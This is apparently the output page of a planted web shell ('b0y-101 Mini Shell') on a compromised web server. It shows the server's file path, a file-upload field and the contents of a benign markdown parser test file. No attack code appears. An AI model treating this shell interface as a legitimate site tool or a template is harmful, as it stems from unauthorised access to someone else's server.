b0y-101 Mini Shell


Current Path : E:/www/b-group.old/business/applicationmba/vendor/cebe/markdown/tests/github-data/
File Upload :
Current File : E:/www/b-group.old/business/applicationmba/vendor/cebe/markdown/tests/github-data/github-basics.md

GitHub Flavored Markdown
========================

Multiple underscores in words
-----------------------------

do_this_and_do_that_and_another_thing

URL autolinking
---------------

http://example.com

Strikethrough
-------------

~~Mistaken text.~~

Fenced code blocks
------------------

```
function test() {
  console.log("notice the blank line before this function?");
}
```

Syntax highlighting
-------------------

```ruby
require 'redcarpet'
markdown = Redcarpet.new("Hello World!")
puts markdown.to_html
```

~~~
this is also code
~~~


Copyright © 2019 by b0y-101